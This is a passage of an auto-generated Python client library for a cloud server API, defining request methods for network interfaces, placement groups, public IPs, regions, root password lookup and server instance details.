post_params=form_params,
files=local_var_files,
response_type='GetNetworkInterfaceDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_network_interface_list(self, get_network_interface_list_request, **kwargs): # noqa: E501
"""get_network_interface_list # noqa: E501
        Get network interface list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_network_interface_list(get_network_interface_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetNetworkInterfaceListRequest get_network_interface_list_request: getNetworkInterfaceListRequest (required)
:return: GetNetworkInterfaceListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_network_interface_list_with_http_info(get_network_interface_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_network_interface_list_with_http_info(get_network_interface_list_request, **kwargs) # noqa: E501
return data
def get_network_interface_list_with_http_info(self, get_network_interface_list_request, **kwargs): # noqa: E501
"""get_network_interface_list # noqa: E501
        Get network interface list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_network_interface_list_with_http_info(get_network_interface_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetNetworkInterfaceListRequest get_network_interface_list_request: getNetworkInterfaceListRequest (required)
:return: GetNetworkInterfaceListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_network_interface_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_network_interface_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_network_interface_list_request' is set
if ('get_network_interface_list_request' not in params or
params['get_network_interface_list_request'] is None):
raise ValueError("Missing the required parameter `get_network_interface_list_request` when calling `get_network_interface_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_network_interface_list_request' in params:
body_params = params['get_network_interface_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getNetworkInterfaceList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetNetworkInterfaceListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_placement_group_detail(self, get_placement_group_detail_request, **kwargs): # noqa: E501
"""get_placement_group_detail # noqa: E501
        Get physical placement group detail  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_placement_group_detail(get_placement_group_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPlacementGroupDetailRequest get_placement_group_detail_request: getPlacementGroupDetailRequest (required)
:return: GetPlacementGroupDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_placement_group_detail_with_http_info(get_placement_group_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_placement_group_detail_with_http_info(get_placement_group_detail_request, **kwargs) # noqa: E501
return data
def get_placement_group_detail_with_http_info(self, get_placement_group_detail_request, **kwargs): # noqa: E501
"""get_placement_group_detail # noqa: E501
        Get physical placement group detail  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_placement_group_detail_with_http_info(get_placement_group_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPlacementGroupDetailRequest get_placement_group_detail_request: getPlacementGroupDetailRequest (required)
:return: GetPlacementGroupDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_placement_group_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_placement_group_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_placement_group_detail_request' is set
if ('get_placement_group_detail_request' not in params or
params['get_placement_group_detail_request'] is None):
raise ValueError("Missing the required parameter `get_placement_group_detail_request` when calling `get_placement_group_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_placement_group_detail_request' in params:
body_params = params['get_placement_group_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getPlacementGroupDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetPlacementGroupDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_placement_group_list(self, get_placement_group_list_request, **kwargs): # noqa: E501
"""get_placement_group_list # noqa: E501
        Get physical placement group list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_placement_group_list(get_placement_group_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPlacementGroupListRequest get_placement_group_list_request: getPlacementGroupListRequest (required)
:return: GetPlacementGroupListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_placement_group_list_with_http_info(get_placement_group_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_placement_group_list_with_http_info(get_placement_group_list_request, **kwargs) # noqa: E501
return data
def get_placement_group_list_with_http_info(self, get_placement_group_list_request, **kwargs): # noqa: E501
"""get_placement_group_list # noqa: E501
        Get physical placement group list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_placement_group_list_with_http_info(get_placement_group_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPlacementGroupListRequest get_placement_group_list_request: getPlacementGroupListRequest (required)
:return: GetPlacementGroupListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_placement_group_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_placement_group_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_placement_group_list_request' is set
if ('get_placement_group_list_request' not in params or
params['get_placement_group_list_request'] is None):
raise ValueError("Missing the required parameter `get_placement_group_list_request` when calling `get_placement_group_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_placement_group_list_request' in params:
body_params = params['get_placement_group_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getPlacementGroupList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetPlacementGroupListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_public_ip_instance_detail(self, get_public_ip_instance_detail_request, **kwargs): # noqa: E501
"""get_public_ip_instance_detail # noqa: E501
        Get public IP instance detail  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_public_ip_instance_detail(get_public_ip_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPublicIpInstanceDetailRequest get_public_ip_instance_detail_request: getPublicIpInstanceDetailRequest (required)
:return: GetPublicIpInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_public_ip_instance_detail_with_http_info(get_public_ip_instance_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_public_ip_instance_detail_with_http_info(get_public_ip_instance_detail_request, **kwargs) # noqa: E501
return data
def get_public_ip_instance_detail_with_http_info(self, get_public_ip_instance_detail_request, **kwargs): # noqa: E501
"""get_public_ip_instance_detail # noqa: E501
        Get public IP instance detail  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_public_ip_instance_detail_with_http_info(get_public_ip_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPublicIpInstanceDetailRequest get_public_ip_instance_detail_request: getPublicIpInstanceDetailRequest (required)
:return: GetPublicIpInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_public_ip_instance_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_public_ip_instance_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_public_ip_instance_detail_request' is set
if ('get_public_ip_instance_detail_request' not in params or
params['get_public_ip_instance_detail_request'] is None):
raise ValueError("Missing the required parameter `get_public_ip_instance_detail_request` when calling `get_public_ip_instance_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_public_ip_instance_detail_request' in params:
body_params = params['get_public_ip_instance_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getPublicIpInstanceDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetPublicIpInstanceDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_public_ip_instance_list(self, get_public_ip_instance_list_request, **kwargs): # noqa: E501
"""get_public_ip_instance_list # noqa: E501
        Get public IP instance list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_public_ip_instance_list(get_public_ip_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPublicIpInstanceListRequest get_public_ip_instance_list_request: getPublicIpInstanceListRequest (required)
:return: GetPublicIpInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_public_ip_instance_list_with_http_info(get_public_ip_instance_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_public_ip_instance_list_with_http_info(get_public_ip_instance_list_request, **kwargs) # noqa: E501
return data
def get_public_ip_instance_list_with_http_info(self, get_public_ip_instance_list_request, **kwargs): # noqa: E501
"""get_public_ip_instance_list # noqa: E501
        Get public IP instance list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_public_ip_instance_list_with_http_info(get_public_ip_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPublicIpInstanceListRequest get_public_ip_instance_list_request: getPublicIpInstanceListRequest (required)
:return: GetPublicIpInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_public_ip_instance_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_public_ip_instance_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_public_ip_instance_list_request' is set
if ('get_public_ip_instance_list_request' not in params or
params['get_public_ip_instance_list_request'] is None):
raise ValueError("Missing the required parameter `get_public_ip_instance_list_request` when calling `get_public_ip_instance_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_public_ip_instance_list_request' in params:
body_params = params['get_public_ip_instance_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getPublicIpInstanceList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetPublicIpInstanceListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_public_ip_target_server_instance_list(self, get_public_ip_target_server_instance_list_request, **kwargs): # noqa: E501
"""get_public_ip_target_server_instance_list # noqa: E501
        Get the list of server instances eligible for public IP assignment  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_public_ip_target_server_instance_list(get_public_ip_target_server_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPublicIpTargetServerInstanceListRequest get_public_ip_target_server_instance_list_request: getPublicIpTargetServerInstanceListRequest (required)
:return: GetPublicIpTargetServerInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_public_ip_target_server_instance_list_with_http_info(get_public_ip_target_server_instance_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_public_ip_target_server_instance_list_with_http_info(get_public_ip_target_server_instance_list_request, **kwargs) # noqa: E501
return data
def get_public_ip_target_server_instance_list_with_http_info(self, get_public_ip_target_server_instance_list_request, **kwargs): # noqa: E501
"""get_public_ip_target_server_instance_list # noqa: E501
        Get the list of server instances eligible for public IP assignment  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_public_ip_target_server_instance_list_with_http_info(get_public_ip_target_server_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPublicIpTargetServerInstanceListRequest get_public_ip_target_server_instance_list_request: getPublicIpTargetServerInstanceListRequest (required)
:return: GetPublicIpTargetServerInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_public_ip_target_server_instance_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_public_ip_target_server_instance_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_public_ip_target_server_instance_list_request' is set
if ('get_public_ip_target_server_instance_list_request' not in params or
params['get_public_ip_target_server_instance_list_request'] is None):
raise ValueError("Missing the required parameter `get_public_ip_target_server_instance_list_request` when calling `get_public_ip_target_server_instance_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_public_ip_target_server_instance_list_request' in params:
body_params = params['get_public_ip_target_server_instance_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getPublicIpTargetServerInstanceList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetPublicIpTargetServerInstanceListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_region_list(self, get_region_list_request, **kwargs): # noqa: E501
"""get_region_list # noqa: E501
        Get region list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_region_list(get_region_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetRegionListRequest get_region_list_request: getRegionListRequest (required)
:return: GetRegionListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_region_list_with_http_info(get_region_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_region_list_with_http_info(get_region_list_request, **kwargs) # noqa: E501
return data
def get_region_list_with_http_info(self, get_region_list_request, **kwargs): # noqa: E501
"""get_region_list # noqa: E501
        Get region list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_region_list_with_http_info(get_region_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetRegionListRequest get_region_list_request: getRegionListRequest (required)
:return: GetRegionListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_region_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_region_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_region_list_request' is set
if ('get_region_list_request' not in params or
params['get_region_list_request'] is None):
raise ValueError("Missing the required parameter `get_region_list_request` when calling `get_region_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_region_list_request' in params:
body_params = params['get_region_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getRegionList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetRegionListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_root_password(self, get_root_password_request, **kwargs): # noqa: E501
"""get_root_password # noqa: E501
Query the root password of a server instance  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_root_password(get_root_password_request, async=True)
>>> result = thread.get()
:param async bool
:param GetRootPasswordRequest get_root_password_request: getRootPasswordRequest (required)
:return: GetRootPasswordResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_root_password_with_http_info(get_root_password_request, **kwargs) # noqa: E501
else:
(data) = self.get_root_password_with_http_info(get_root_password_request, **kwargs) # noqa: E501
return data
def get_root_password_with_http_info(self, get_root_password_request, **kwargs): # noqa: E501
"""get_root_password # noqa: E501
Query the root password of a server instance  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_root_password_with_http_info(get_root_password_request, async=True)
>>> result = thread.get()
:param async bool
:param GetRootPasswordRequest get_root_password_request: getRootPasswordRequest (required)
:return: GetRootPasswordResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_root_password_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_root_password" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_root_password_request' is set
if ('get_root_password_request' not in params or
params['get_root_password_request'] is None):
raise ValueError("Missing the required parameter `get_root_password_request` when calling `get_root_password`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_root_password_request' in params:
body_params = params['get_root_password_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getRootPassword', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetRootPasswordResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_root_password_server_instance_list(self, get_root_password_server_instance_list_request, **kwargs): # noqa: E501
"""get_root_password_server_instance_list # noqa: E501
Query root passwords for a list of server instances  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_root_password_server_instance_list(get_root_password_server_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetRootPasswordServerInstanceListRequest get_root_password_server_instance_list_request: getRootPasswordServerInstanceListRequest (required)
:return: GetRootPasswordServerInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_root_password_server_instance_list_with_http_info(get_root_password_server_instance_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_root_password_server_instance_list_with_http_info(get_root_password_server_instance_list_request, **kwargs) # noqa: E501
return data
def get_root_password_server_instance_list_with_http_info(self, get_root_password_server_instance_list_request, **kwargs): # noqa: E501
"""get_root_password_server_instance_list # noqa: E501
Query root passwords for a list of server instances  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_root_password_server_instance_list_with_http_info(get_root_password_server_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetRootPasswordServerInstanceListRequest get_root_password_server_instance_list_request: getRootPasswordServerInstanceListRequest (required)
:return: GetRootPasswordServerInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_root_password_server_instance_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_root_password_server_instance_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_root_password_server_instance_list_request' is set
if ('get_root_password_server_instance_list_request' not in params or
params['get_root_password_server_instance_list_request'] is None):
raise ValueError("Missing the required parameter `get_root_password_server_instance_list_request` when calling `get_root_password_server_instance_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_root_password_server_instance_list_request' in params:
body_params = params['get_root_password_server_instance_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getRootPasswordServerInstanceList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetRootPasswordServerInstanceListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_server_image_product_list(self, get_server_image_product_list_request, **kwargs): # noqa: E501
"""get_server_image_product_list # noqa: E501
Query the server image product list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_server_image_product_list(get_server_image_product_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetServerImageProductListRequest get_server_image_product_list_request: getServerImageProductListRequest (required)
:return: GetServerImageProductListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_server_image_product_list_with_http_info(get_server_image_product_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_server_image_product_list_with_http_info(get_server_image_product_list_request, **kwargs) # noqa: E501
return data
def get_server_image_product_list_with_http_info(self, get_server_image_product_list_request, **kwargs): # noqa: E501
"""get_server_image_product_list # noqa: E501
Query the server image product list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_server_image_product_list_with_http_info(get_server_image_product_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetServerImageProductListRequest get_server_image_product_list_request: getServerImageProductListRequest (required)
:return: GetServerImageProductListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_server_image_product_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_server_image_product_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_server_image_product_list_request' is set
if ('get_server_image_product_list_request' not in params or
params['get_server_image_product_list_request'] is None):
raise ValueError("Missing the required parameter `get_server_image_product_list_request` when calling `get_server_image_product_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_server_image_product_list_request' in params:
body_params = params['get_server_image_product_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getServerImageProductList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetServerImageProductListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_server_instance_detail(self, get_server_instance_detail_request, **kwargs): # noqa: E501
"""get_server_instance_detail # noqa: E501
Query server instance details  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_server_instance_detail(get_server_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetServerInstanceDetailRequest get_server_instance_detail_request: getServerInstanceDetailRequest (required)
:return: GetServerInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_server_instance_detail_with_http_info(get_server_instance_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_server_instance_detail_with_http_info(get_server_instance_detail_request, **kwargs) # noqa: E501
return data
def get_server_instance_detail_with_http_info(self, get_server_instance_detail_request, **kwargs): # noqa: E501
"""get_server_instance_detail # noqa: E501
Query server instance details  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_server_instance_detail_with_http_info(get_server_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetServerInstanceDetailRequest get_server_instance_detail_request: getServerInstanceDetailRequest (required)
:return: GetServerInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_server_instance_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_server_instance_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_server_instance_detail_request' is set
if ('get_server_instance_detail_request' not in params or
params['get_server_instance_detail_request'] is None):
raise ValueError("Missing the required parameter `get_server_instance_detail_request` when calling `get_server_instance_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_server_instance_detail_request' in params:
body_params = params['get_server_instance_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
